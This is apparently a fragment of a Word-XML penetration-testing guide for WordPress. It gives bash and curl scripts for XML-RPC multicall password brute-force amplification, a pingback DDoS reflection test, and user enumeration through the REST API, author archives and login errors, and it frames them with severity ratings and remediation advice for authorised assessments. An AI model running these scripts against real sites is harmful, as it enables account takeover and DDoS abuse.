      <w:proofErr w:type="gramStart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Replace with enumerated user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Create a SMALL password list for PoC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passwords_poc.txt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&lt;&lt;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'EOF'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password123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admin123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test123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demo123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welcome123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EOF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Build multicall XML payload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multicall_payload.xml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&lt;&lt;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'XMLEOF'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&lt;?xml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version="1.0"?&gt;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methodCall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methodName&gt;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system.multicall&lt;/methodName&gt;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params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param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value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array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data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XMLEOF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Add each password as a separate call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while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read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password; </w:t>
      </w:r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&gt;&gt;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multicall_payload.xml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&lt;&lt;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XMLEOF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value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struct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member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  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name&gt;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methodName&lt;/name&gt;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      &lt;value&gt;&lt;string&gt;wp.getUsersBlogs&lt;/string&gt;&lt;/value&gt;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    &lt;/member&gt;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            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member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  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name&gt;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params&lt;/name&gt;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  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value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    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array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      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data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                       &lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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value</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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&gt;&lt;string&gt;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$USERNAME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&lt;/string&gt;&lt;/value&gt;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 xml:space="preserve">                        &lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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value</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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&gt;&lt;string&gt;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$password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&lt;/string&gt;&lt;/value&gt;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          &lt;/data&gt;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        &lt;/array&gt;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      &lt;/value&gt;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    &lt;/member&gt;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  &lt;/struct&gt;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  &lt;/value&gt;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XMLEOF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done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passwords_poc.txt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cat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&gt;&gt;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multicall_payload.xml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&lt;&lt;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'XMLEOF'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  &lt;/data&gt;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&lt;/array&gt;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&lt;/value&gt;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&lt;/param&gt;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&lt;/params&gt;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&lt;/methodCall&gt;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XMLEOF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Execute ONE request with 5 password attempts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"Testing 5 passwords in a single request..."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-X POST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$URL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-H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"Content-Type: text/xml"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--data @multicall_payload.xml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&gt;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evidence/xmlrpc_multicall_bruteforce.xml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Analyze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response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"Response saved to evidence/xmlrpc_multicall_bruteforce.xml"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"Checking for successful authentication..."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grep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-q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"isAdmin"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evidence/xmlrpc_multicall_bruteforce.xml; </w:t>
      </w:r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"[!] CRITICAL: At least one password was successful!"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"[!] Review evidence/xmlrpc_multicall_bruteforce.xml for details"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else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"[*] No valid passwords in test set (expected for PoC)"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"[*] However, 5 passwords were tested in ONE request - demonstrating amplification"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A626A4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# Clean up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rm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passwords_poc.txt multicall_payload.xml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**Evidence to Document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`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1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. Screenshot/save the single HTTP request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2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. Show it contains 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5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(or </w:t>
      </w:r>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:ascii="var(--font-mono)" w:eastAsia="Times New Roman" w:hAnsi="var(--font-mono)" w:cs="Courier New"/>
          <w:color w:val="4078F2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>more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 wp.getUsersBlogs calls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3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. Demonstrate that all </w:t>
      </w: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5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were processed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4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. Calculate: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"Attacker could test 5000 passwords in 1000 requests instead of 5000 requests"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B76B01"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>5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. Rate limiting effectiveness: </w:t>
      </w:r>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:ascii="var(--font-mono)" w:eastAsia="Times New Roman" w:hAnsi="var(--font-mono)" w:cs="Courier New"/>
          <w:color w:val="50A14F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>"Server rate limit is 100 req/min, but allows 500 pwd/min via multicall"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GB" w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>4.6 Pingback DDoS Participation Test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Controlled Testing Method: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bash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>Set</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B03A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GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> up a listener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on</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> YOUR server first</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="00991D4D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Cs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00991D4D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">On your server: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00991D4D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00991D4D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> -lvnp 8080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991D4D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>Then test pingback from target</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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 xml:space="preserve">curl -s -X POST </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="001B03AE">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
          </w:rPr>
          <w:t>https://target.com/xmlrpc.php</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">-H "Content-Type: text/xml" </w:t>
      </w:r>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:br/>
        <w:t>-d '&lt;?xml version="1.0"?&gt; &lt;methodCall&gt; &lt;methodName&gt;pingback.ping&lt;/methodName&gt; &lt;params&gt; &lt;param&gt;&lt;value&gt;&lt;string&gt;</w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="001B03AE">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
          </w:rPr>
          <w:t>http://YOUR-SERVER-IP:8080/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>&lt;/string&gt;&lt;/value&gt;&lt;/param&gt; &lt;param&gt;&lt;value&gt;&lt;string&gt;</w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="001B03AE">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
          </w:rPr>
          <w:t>https://target.com/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>&lt;/string&gt;&lt;/value&gt;&lt;/param&gt; &lt;/params&gt; &lt;/methodCall&gt;' &gt; evidence/xmlrpc_pingback_ddos_test.xml</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00991D4D" w:rsidRPr="001B03AE" w:rsidRDefault="00991D4D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</w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="00991D4D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Cs w:val="48"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00991D4D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>Check your server logs - did you receive a connection from target.com?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="00991D4D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Cs w:val="48"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00991D4D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>If YES: Target can be used as DDoS reflection/amplification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**Impact Demonstration (Document, Don't Execute):**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lastRenderedPageBreak/>
        <w:t>Attacker sends 1000 pingback requests to target.com Target.com sends 1000 HTTP requests to victim.com Result:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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Attacker bandwidth: Minimal (small XML payloads)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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Target.com bandwidth: Medium (HTTP requests)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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Victim.com bandwidth: HIGH (receiving 1000 unwanted requests)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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Target.com IP reputation: Damaged (appears to be attacking victim)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### 4.7 Response Analysis &amp; Interpretation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**Error Code Reference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| Fault Code | Meaning | Implication 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|------------|---------|-------------|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| 403 | Invalid credentials | User might exist, password wrong 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| 405 | Method Not Allowed | XML-RPC might be disabled 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| -32601 | Method not found | Specific method disabled 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| -32700 | Parse error | Malformed XML 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| 500 | Internal Server Error |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Various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issues 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**Response Type Matrix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Create a decision tree for assessment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Valid XML response?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├─ YES: XML-RPC is enabled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│   ├─ Contains method list?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│   │   ├─ YES: Fully functional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│   │   │   ├─ system.multicall present?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→ HIGH RISK (brute-force amplification)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│   │   │   ├─ pingback.ping present?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→ MEDIUM RISK (DDoS participation)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│   │   │   └─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Only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safe methods? → LOW RISK (limited functionality)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│   │   └─ NO: Restricted functionality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│   └─ Contains fault?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│       └─ Analyze fault code (see table above)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└─ NO: XML-RPC likely disabled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├─ Check HTTP status code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└─ Document blocking method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### 4.8 Severity Rating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Matrix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for XML-RPC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**Rating Criteria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| Scenario | Severity | Rationale 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|----------|----------|-----------|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| XML-RPC disabled | INFO | No vulnerability, document for completeness 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| Enabled, no dangerous methods, strong auth | LOW | Limited attack surface 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| Enabled, user enumeration possible | MEDIUM | Information disclosure aids attacks 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| Enabled, pingback.ping functional | MEDIUM | DDoS participation risk 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| Enabled, system.multicall + weak passwords | HIGH | Brute-force amplification viable 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| Enabled, multicall + no rate limiting + exposed users | CRITICAL | Trivial account takeover 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**Evidence Checklist for Reporting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□ Initial detection (system.listMethods response) □ Complete method list □ User enumeration test results □ Brute-force amplification PoC (if applicable) □ Pingback test results (if applicable) □ HTTP request/response logs □ Impact calculation (e.g., "500 passwords/min vs 100 req/min limit")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EB023D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  <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EB023D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### 4.9 Professional XML-RPC Test Workflow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Complete XML-RPC Assessment Script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#!/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bin/bash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TARGET="https://target.com"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EVIDENCE_DIR="evidence/xmlrpc"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mkdir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-p $EVIDENCE_DIR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"=== WordPress XML-RPC Assessment ==="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"Target: $TARGET"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"Date: $(date)"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EB023D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0"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB023D">
        <w:rPr>
          <w:rFonts w:ascii="var(--font-mono)" w:eastAsia="Times New Roman" w:hAnsi="var(--font-mono)" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="383A42"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t># Step 1: Detection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"[1/6] Testing XML-RPC availability..."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-X POST $TARGET/xmlrpc.php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-H "Content-Type: text/xml"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'&lt;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?xml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version="1.0"?&gt;&lt;methodCall&gt;&lt;methodName&gt;system.listMethods&lt;/methodName&gt;&lt;params&gt;&lt;/params&gt;&lt;/methodCall&gt;'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&gt; $EVIDENCE_DIR/01_listMethods.xml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grep -q "&lt;methodResponse&gt;" $EVIDENCE_DIR/01_listMethods.xml;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  [+] XML-RPC is ENABLED"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else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  [-] XML-RPC appears disabled or blocked"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exit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0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EB023D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0"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB023D">
        <w:rPr>
          <w:rFonts w:ascii="var(--font-mono)" w:eastAsia="Times New Roman" w:hAnsi="var(--font-mono)" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="383A42"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t># Step 2: Method extraction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"[2/6] Extracting available methods..."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grep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-o '&lt;string&gt;[^&lt;]*&lt;/string&gt;' $EVIDENCE_DIR/01_listMethods.xml |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sed 's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/&lt;[^&gt;]*&gt;//g' | sort &gt; $EVIDENCE_DIR/02_methods.txt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method_count=$(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wc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-l &lt; $EVIDENCE_DIR/02_methods.txt)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  [+] Found $method_count methods"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="00EB023D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0"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="00EB023D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0"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB023D">
        <w:rPr>
          <w:rFonts w:ascii="var(--font-mono)" w:eastAsia="Times New Roman" w:hAnsi="var(--font-mono)" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="383A42"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t># Step 3: Check for dangerous methods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"[3/6] Checking for high-risk methods..."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method in "system.multicall" "pingback.ping" "wp.getUsersBlogs"; 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grep -q "^$method$" $EVIDENCE_DIR/02_methods.txt;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  [!] FOUND: $method"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EB023D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0"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB023D">
        <w:rPr>
          <w:rFonts w:ascii="var(--font-mono)" w:eastAsia="Times New Roman" w:hAnsi="var(--font-mono)" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="383A42"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t># Step 4: User enumeration test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"[4/6] Testing user enumeration..."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-X POST $TARGET/xmlrpc.php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-H "Content-Type: text/xml"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'&lt;?xml version="1.0"?&gt;&lt;methodCall&gt;&lt;methodName&gt;wp.getUsersBlogs&lt;/methodName&gt;&lt;params&gt;&lt;param&gt;&lt;value&gt;&lt;string&gt;admin&lt;/string&gt;&lt;/value&gt;&lt;/param&gt;&lt;param&gt;&lt;value&gt;&lt;string&gt;InvalidPass123&lt;/string&gt;&lt;/value&gt;&lt;/param&gt;&lt;/params&gt;&lt;/methodCall&gt;'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&gt; $EVIDENCE_DIR/03_user_enum_test.xml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grep -q "Incorrect username or password" $EVIDENCE_DIR/03_user_enum_test.xml;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  [+] User enumeration is possible (admin user exists)"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EB023D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0"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="00EB023D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0"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB023D">
        <w:rPr>
          <w:rFonts w:ascii="var(--font-mono)" w:eastAsia="Times New Roman" w:hAnsi="var(--font-mono)" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="383A42"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t># Step 5: Multicall test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"[5/6] Testing system.multicall functionality..."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grep -q "^system.multicall$" $EVIDENCE_DIR/02_methods.txt;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-X POST $TARGET/xmlrpc.php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-H "Content-Type: text/xml"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    -d '&lt;?xml version="1.0"?&gt;&lt;methodCall&gt;&lt;methodName&gt;system.multicall&lt;/methodName&gt;&lt;params&gt;&lt;param&gt;&lt;value&gt;&lt;array&gt;&lt;data&gt;&lt;value&gt;&lt;struct&gt;&lt;member&gt;&lt;name&gt;methodName&lt;/name&gt;&lt;value&gt;&lt;string&gt;system.getCapabilities&lt;/string&gt;&lt;/value&gt;&lt;/member&gt;&lt;/struct&gt;&lt;/value&gt;&lt;/data&gt;&lt;/array&gt;&lt;/value&gt;&lt;/param&gt;&lt;/params&gt;&lt;/methodCall&gt;'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&gt; $EVIDENCE_DIR/04_multicall_test.xml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grep -q "&lt;methodResponse&gt;" $EVIDENCE_DIR/04_multicall_test.xml;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  [!]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system.multicall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is FUNCTIONAL - brute-force amplification possible"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EB023D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</w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="00EB023D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  <w:r w:rsidRPr="00EB023D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# Step 6: Generate report summary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"[6/6] Generating summary..."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cat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&gt; $EVIDENCE_DIR/00_SUMMARY.txt &lt;&lt; EOF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XML-RPC Assessment Summary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==========================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Target: $TARGET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Date: $(date)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Findings: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XML-RPC Status: ENABLED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Methods Available: $method_count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- High-Risk Methods: $(grep -E "system.multicall|pingback.ping" $EVIDENCE_DIR/02_methods.txt |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'\n' ', ')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User Enumeration: $(grep -q "Incorrect username or password" $EVIDENCE_DIR/03_user_enum_test.xml &amp;&amp; echo "POSSIBLE" || echo "NOT TESTED")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Recommendation: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EOF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grep -q "system.multicall" $EVIDENCE_DIR/02_methods.txt;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  [!] HIGH RISK: Disable XML-RPC or restrict to authenticated users only"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"- Disable XML-RPC or implement strong authentication and rate limiting" &gt;&gt; $EVIDENCE_DIR/00_SUMMARY.txt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else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  [*] MEDIUM RISK: Consider disabling if not required"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"- Consider disabling XML-RPC if not required for functionality" &gt;&gt; $EVIDENCE_DIR/00_SUMMARY.txt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"Assessment complete. Evidence saved to $EVIDENCE_DIR/"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EB023D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30"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB023D">
        <w:rPr>
          <w:rFonts w:ascii="var(--font-mono)" w:eastAsia="Times New Roman" w:hAnsi="var(--font-mono)" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="383A42"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>## 5. USER ENUMERATION TECHNIQUES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EB023D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##</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB023D">
        <w:rPr>
          <w:rFonts w:ascii="var(--font-mono)" w:eastAsia="Times New Roman" w:hAnsi="var(--font-mono)" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="383A42"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t># 5.1 Why User Enumeration Matters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**Practical Impact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Reduces brute-force search space (usernames + passwords → just passwords)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Enables targeted social engineering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Reveals organizational structure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Often combined with password spraying attacks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**Severity Context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**Alone**: Usually rated LOW or MEDIUM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**Combined with weak passwords**: HIGH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**Combined with XML-RPC brute-force amplification**: CRITICAL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6B6739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0"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B6739">
        <w:rPr>
          <w:rFonts w:ascii="var(--font-mono)" w:eastAsia="Times New Roman" w:hAnsi="var(--font-mono)" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="383A42"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">### 5.2 REST API User </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006B6739">
        <w:rPr>
          <w:rFonts w:ascii="var(--font-mono)" w:eastAsia="Times New Roman" w:hAnsi="var(--font-mono)" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="383A42"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>Enumeration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**Method 1: Direct User Endpoint**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Fetch all users via REST API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"https://target.com/wp-json/wp/v2/users" | jq . &gt;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evidence/rest_api_users_full.json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Extract key information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cat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evidence/rest_api_users_full.json | jq -r '.[] | "\(.id)|\(.name)|\(.slug)|\(.description)"' &gt; evidence/users_extracted.txt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Example output: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1|Administrator|admin|Site administrator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2|John Doe|john-doe|Marketing manager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3|Jane Smith|jane-smith|Content writer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**Information Disclosed (Typical):**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User ID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Display name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Username (slug)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Avatar URL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Description/Bio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Link to author archive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**Testing for Restrictions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Test with per_page parameter to check limits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"https://target.com/wp-json/wp/v2/users?per_page=100" | jq '. |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length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Test with context parameter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"https://target.com/wp-json/wp/v2/users?context=edit" | jq .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If this works, you might get emails, roles, etc. (rare, but test it)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Test specific user ID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"https://target.com/wp-json/wp/v2/users/1" | jq .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**Bypass Techniques if Blocked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Try different API versions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"https://target.com/wp-json/wp/v1/users" | jq .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Try OEmbed user enumeration (indirect)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"https://target.com/wp-json/oembed/1.0/embed?url=https://target.com/author/admin/" | jq .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6B6739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0"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B6739">
        <w:rPr>
          <w:rFonts w:ascii="var(--font-mono)" w:eastAsia="Times New Roman" w:hAnsi="var(--font-mono)" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="383A42"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">### 5.3 Author ID </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006B6739">
        <w:rPr>
          <w:rFonts w:ascii="var(--font-mono)" w:eastAsia="Times New Roman" w:hAnsi="var(--font-mono)" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="383A42"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>Enumeration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**Method 2: Author Archive Crawling**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Test author ID enumeration via permalinks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="00904EF6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  <w:proofErr w:type="gramStart"/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for</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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 xml:space="preserve"> id in {1..10}; do</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="00904EF6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 xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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response</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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=$(curl -sL "https://target.com/?author=$id" -w "%{url_effective}|%{http_code}" -o /dev/null)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="00904EF6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 xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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url</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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=$(echo $response | cut -d'|' -f1)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="00904EF6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 xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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code</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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=$(echo $response | cut -d'|' -f2)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="00904EF6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 xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="00904EF6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 xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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if</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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 xml:space="preserve"> [ "$code" == "200" ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="00904EF6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 xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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username</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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=$(echo $url | grep -oP 'author/\K[^/]+')</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="00904EF6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 xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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echo</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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 xml:space="preserve"> "ID: $id | Username: $username | URL: $url"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="00904EF6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 xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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done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| tee evidence/author_id_enumeration.txt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**Pretty Permalinks Enumeration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site uses /author/username/ structure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Try common usernames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cat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&gt; common_users.txt &lt;&lt; 'EOF'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admin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administrator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test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demo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webmaster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editor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author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user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EOF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while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read username; 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code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=$(curl -s -o /dev/null -w "%{http_code}" "https://target.com/author/$username/")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"$code" == "200" ];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"[+] Valid user: $username"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&lt; common_users.txt | tee evidence/author_permalink_enum.txt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904EF6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</w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="00904EF6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### 5.4 XML-RPC User Enumeration (Covered in Section 4)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**Quick Reference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Using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wp.getUsersBlogs method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-X POST https://target.com/xmlrpc.php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-H "Content-Type: text/xml"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'&lt;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?xml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version="1.0"?&gt;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methodCall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methodName&gt;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wp.getUsersBlogs&lt;/methodName&gt;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params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param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&gt;&lt;value&gt;&lt;string&gt;TESTUSER&lt;/string&gt;&lt;/value&gt;&lt;/param&gt;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param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&gt;&lt;value&gt;&lt;string&gt;WRONGPASSWORD&lt;/string&gt;&lt;/value&gt;&lt;/param&gt;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&lt;/params&gt;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&lt;/methodCall&gt;' | grep -q "Incorrect username or password" &amp;&amp; echo "User exists"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````</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="00904EF6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</w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="00904EF6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### 5.5 wp-login.php Behavior Analysis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**Method 4: Login Error Message Differentiation**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**Modern WordPress (usually):**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Generic error: "ERROR: Invalid username or password"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**Older WordPress or misconfigured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Invalid username: "ERROR: Invalid username"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Invalid password: "ERROR: The password you entered for the username X is incorrect"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**Testing Script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#!/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bin/bash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login_user_enum.sh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URL="https://target.com/wp-login.php"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test_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user(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 {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username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=$1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response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=$(curl -s -X POST $URL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-d "log=$username&amp;pwd=InvalidPassword123&amp;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wp-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submit=Log+In"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-L)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"$response" &gt; /tmp/login_test.html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grep -q "Invalid username" /tmp/login_test.html;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"[-] User does NOT exist: $username"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elif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grep 